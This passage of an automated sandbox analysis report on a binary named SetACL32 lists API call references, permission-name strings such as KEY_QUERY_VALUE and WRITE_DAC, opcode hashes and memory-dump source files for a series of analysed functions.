                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: H_prolog3_
                • String ID: @M)w
                • API String ID: 2427045233-1211491014
                • Opcode ID: 0bd1e75cb429f70dce89e238a5097975d6e31a6a5feff54b7ee0b2a51afc0870
                • Instruction ID: 2a0ca550a2ebeead8b60d91e3648cef8325908a71e4c2ca9628c46a95cdb8826
                • Opcode Fuzzy Hash: 0bd1e75cb429f70dce89e238a5097975d6e31a6a5feff54b7ee0b2a51afc0870
                • Instruction Fuzzy Hash: F871B175D0021A9BEF24DF98C880BFEB7B5AF55360F344129E910A7280DB76AC45EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00F955ED
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: 5500a582e357a8a2293979def69270bb028607efa9f61cd03235dd37a28032d9
                • Instruction ID: 7b4d25d9162213a458efc7454d69ebcba54af56244132982351aaf8864bd7da6
                • Opcode Fuzzy Hash: 5500a582e357a8a2293979def69270bb028607efa9f61cd03235dd37a28032d9
                • Instruction Fuzzy Hash: 00517C62E0950586FF17FB18CD4136A7BA0EB40B60F644D59F0C2822A9EB358C95FF46
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71246
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_QUERY_VALUE$`
                • API String ID: 1737263090-3949433271
                • Opcode ID: d7a53a08bb69f563883b92e7ab555f932fece84d76a042068893aea548b70b9c
                • Instruction ID: 7d5b16d336dedd829bc8ac4fa155041d91e0e9708058629b803f53c49975a724
                • Opcode Fuzzy Hash: d7a53a08bb69f563883b92e7ab555f932fece84d76a042068893aea548b70b9c
                • Instruction Fuzzy Hash: 82517031A002188BDB24DF68CC95BA9B7B1BF45314F1481DAD90DAB392DB35AE85DF41
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71368
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_SET_VALUE$d
                • API String ID: 1737263090-3572923805
                • Opcode ID: c3cd5470b54e2a3c9e054b41be3011e1791e45e07f0a1e0df44ea3cde6e586d6
                • Instruction ID: 0ab467eb81a3ee3e9f96a600093c824080abcd2dd164cb53aed1134eb974bfd9
                • Opcode Fuzzy Hash: c3cd5470b54e2a3c9e054b41be3011e1791e45e07f0a1e0df44ea3cde6e586d6
                • Instruction Fuzzy Hash: D4516E31A012288FDB24DF68CC95BA9B7B1BF45314F1481EAD90DAB391DB31AE85DF41
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71484
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_CREATE_SUB_KEY$h
                • API String ID: 1737263090-3856693117
                • Opcode ID: f7eda6e9b4616b139be81c20f8d0414fd933742734eb4736a5ee13b545942de1
                • Instruction ID: 716d07f9b9a6ecd0261017c3fd3d98574fee4e413e7b79fac0ab0f6205152b66
                • Opcode Fuzzy Hash: f7eda6e9b4616b139be81c20f8d0414fd933742734eb4736a5ee13b545942de1
                • Instruction Fuzzy Hash: C3517F71E002248BDB28DF28CC95B99B7B1BF45314F0881DAD80AAB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71596
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_ENUMERATE_SUB_KEYS$l
                • API String ID: 1737263090-1063618012
                • Opcode ID: f4ab26f429c93b4340bd2a2f20d67eaf6c4632cdcc23508a6199522b30943e9f
                • Instruction ID: 625e3fa61f3144f3e2da5533d08b390bb4fdb0b97fd61d3d1011f69482d00bf7
                • Opcode Fuzzy Hash: f4ab26f429c93b4340bd2a2f20d67eaf6c4632cdcc23508a6199522b30943e9f
                • Instruction Fuzzy Hash: 31515B71E002288BDB28DF28CC55BA9B7B1BF45314F0881EAD949AB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F716A8
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_NOTIFY$p
                • API String ID: 1737263090-1166435531
                • Opcode ID: 7173b3542b89243507428edf54f1494e63e21d1ad9825b79e53e063bf5171e2b
                • Instruction ID: 53ad2bdc6abc514acd9a75e36835d07e66020171d6d6413b41a831ce000dd0ec
                • Opcode Fuzzy Hash: 7173b3542b89243507428edf54f1494e63e21d1ad9825b79e53e063bf5171e2b
                • Instruction Fuzzy Hash: B2515E31E00228CBDB28DF68CC55BA9B7B2BF44314F0481EAD94DAB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F717BA
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_CREATE_LINK$t
                • API String ID: 1737263090-3987958626
                • Opcode ID: 8be2fd47a3f543a7dcef1632c8d7060d59c4563f28dc4b7c3655dab8b2823d58
                • Instruction ID: 8b3f45b72ffb3d2c7919ea99688e65f0a379de0b65de9132f8f2bd4611aaee3b
                • Opcode Fuzzy Hash: 8be2fd47a3f543a7dcef1632c8d7060d59c4563f28dc4b7c3655dab8b2823d58
                • Instruction Fuzzy Hash: 3D516D71E00228CFDB24DB68CC55BA8B7B1BF44314F0881DAD949AB391DB35AE45DF52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71938
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: WRITE_DAC$z
                • API String ID: 1737263090-1919552622
                • Opcode ID: ad8ffac67c897775e85e1873c4f2fc3690293ee64689f6aefc9fee61e5ea1de0
                • Instruction ID: b014b9064e662d8549b6687106f04d93013257bd5c172d68862225c896f1ed88
                • Opcode Fuzzy Hash: ad8ffac67c897775e85e1873c4f2fc3690293ee64689f6aefc9fee61e5ea1de0
                • Instruction Fuzzy Hash: F5516E31E00228CBEB28DF68CC55B99B7B1BF44314F0481EAD949AB391DB35AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,7FFFFFFF), ref: 00FA4D5F
                • __dosmaperr.LIBCMT ref: 00FA4D66
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr
                • String ID: @M)w
                • API String ID: 1659562826-1211491014
                • Opcode ID: df5b6acc597352744fdd739d0f520308bb7f348cdaed46ae595e011d968fba30
                • Instruction ID: d85ab9ba4b46983143aaf331dc4ed938c665dcb19bbcc5b78de919f31cec1358
                • Opcode Fuzzy Hash: df5b6acc597352744fdd739d0f520308bb7f348cdaed46ae595e011d968fba30
                • Instruction Fuzzy Hash: 63417CB1A04155AFDB11DF28CC82BB97FE5EFC7310F284158E8858B242D3B5AD11B790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F8E5F9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 19d6763ecd1688f2e265e9db118c4f78a9c70be3f47d5d61b839cac27a31c96a
                • Instruction ID: 30ceee53f681ffa17291d5303951e35d739e30735f5d381356c57e19a457dd7c
                • Opcode Fuzzy Hash: 19d6763ecd1688f2e265e9db118c4f78a9c70be3f47d5d61b839cac27a31c96a
                • Instruction Fuzzy Hash: 0F415671D00209EFCF16EF98CD81AEEBBB5BF68314F198059F914A6261E3359950EB60
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,00FA18F1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008), ref: 00FA1691
                • GetLastError.KERNEL32(00FA18F1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?,?), ref: 00FA16C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: 54ad0eabcca7c9ee2e2daa4c4c19ca61044933b3c836532254a47d1b5e62f652
                • Instruction ID: 15d585b70b8b0080ec9716d486fbcf6b5d6d326350f637291cd9f25f4430f7ac
                • Opcode Fuzzy Hash: 54ad0eabcca7c9ee2e2daa4c4c19ca61044933b3c836532254a47d1b5e62f652
                • Instruction Fuzzy Hash: 86318FB1A00219AFDB24CF69CC91BE977B9FB48310F1944A9E905D73A0D670AE849B60
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00FA18E1,?,00000000,00000000,?,?,00000000), ref: 00FA1569
                • GetLastError.KERNEL32(?,00FA18E1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?), ref: 00FA158F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: 6887e04548e59350de0ce80bff0cb2c44ef8c9332f0b7cb1aa6a53631499800b
                • Instruction ID: a0a376906ab1198450f255d2614ac1a401dbe27deab895d217336d52b2943597
                • Opcode Fuzzy Hash: 6887e04548e59350de0ce80bff0cb2c44ef8c9332f0b7cb1aa6a53631499800b
                • Instruction Fuzzy Hash: 2C217371E002189FCB25DF19DC819E9B3B9FF89314F1544AAE90AD7250D730DE85DB51
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00FA1901,?,00000000,00000000,?,?,00000000), ref: 00FA1480
                • GetLastError.KERNEL32(?,00FA1901,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?), ref: 00FA14A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: fd39be504da8cd15c7da5dc0ba758ce48b008d57187e4f6dac66240c426f10c7
                • Instruction ID: a28c550416293f6b291221aa0569075e319bf326033724cb16f2ee3d0aa3e8bf
                • Opcode Fuzzy Hash: fd39be504da8cd15c7da5dc0ba758ce48b008d57187e4f6dac66240c426f10c7
                • Instruction Fuzzy Hash: 2A21BF70A102189BCB15CF29CC80AE9B7B9FB4E311F2541A9ED06D7211D630DE46DB60
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                • FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,746D712B,?,?,?,?,?,00FA9D0D,000000FF), ref: 00F675C4
                • LocalFree.KERNEL32(00000000,asio.system error,00000011,?,?,?,?,?,00FA9D0D,000000FF), ref: 00F67658
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FormatFreeLocalMessage
                • String ID: asio.system error
                • API String ID: 1427518018-3828095645
                • Opcode ID: b9e54ebc1cec38584a9fbc483118fc490f62917325d620985e567709b39f93c6
                • Instruction ID: 4ad8266bf7c5040ee3e83c6f3f68027463ca254320a2b369555b0fb661e39a35
                • Opcode Fuzzy Hash: b9e54ebc1cec38584a9fbc483118fc490f62917325d620985e567709b39f93c6
                • Instruction Fuzzy Hash: 7B3127B1A08746AFE711CF18CC04FAABBB9FF45324F144259E8109B3C0D7B6A900DBA0
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6157B
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F615CA
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                • String ID: bad locale name
                • API String ID: 3988782225-1405518554
                • Opcode ID: 36aef4410844b720566d95c667f48c00615f6f7ef036e21012931fa637b9bf64
                • Instruction ID: 4248073725b59a956e4967bc023000327e6a1b6a75e3ee6cd9a2c93428486d9d
                • Opcode Fuzzy Hash: 36aef4410844b720566d95c667f48c00615f6f7ef036e21012931fa637b9bf64
                • Instruction Fuzzy Hash: 3C11E4B18047409FD730CF68D901787BBE8EF08710F044A2EE889C3740D7B5AA04CBA1
                Uniqueness
                • Uniqueness Score: -1.00%
                APIs
                  • Part of subcall function 00F9FFE3: EnterCriticalSection.KERNEL32(00000000,?,00FA173E,00000000,00FC7438,00000010,00F9ADA2,00000000,?,?,?,?,?,00F9BF70,?), ref: 00F9FFFE
                • FlushFileBuffers.KERNEL32(00000000,00FC7418,0000000C,00FA0F49,00F9ACFF,?,00000001,?,00F9ACFF,?), ref: 00FA0E8B
                • GetLastError.KERNEL32 ref: 00FA0E9C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                • String ID: @M)w
                • API String ID: 4109680722-1211491014
                • Opcode ID: 1b45b7b73ef827edd72cbfea2bb4b58f6437659aaa9b7bee54972cd55392b0fb
                • Instruction ID: 54fd1971fe468760aa92fc39140a192ad2b387a9f6f9dc15828a1438ee963528
                • Opcode Fuzzy Hash: 1b45b7b73ef827edd72cbfea2bb4b58f6437659aaa9b7bee54972cd55392b0fb
                • Instruction Fuzzy Hash: A90192B2A003148FDB14AF68ED46A9D7BE8EF4A724F10451AF411DB2A1DB789901AB90
                Uniqueness
                • Uniqueness Score: -1.00%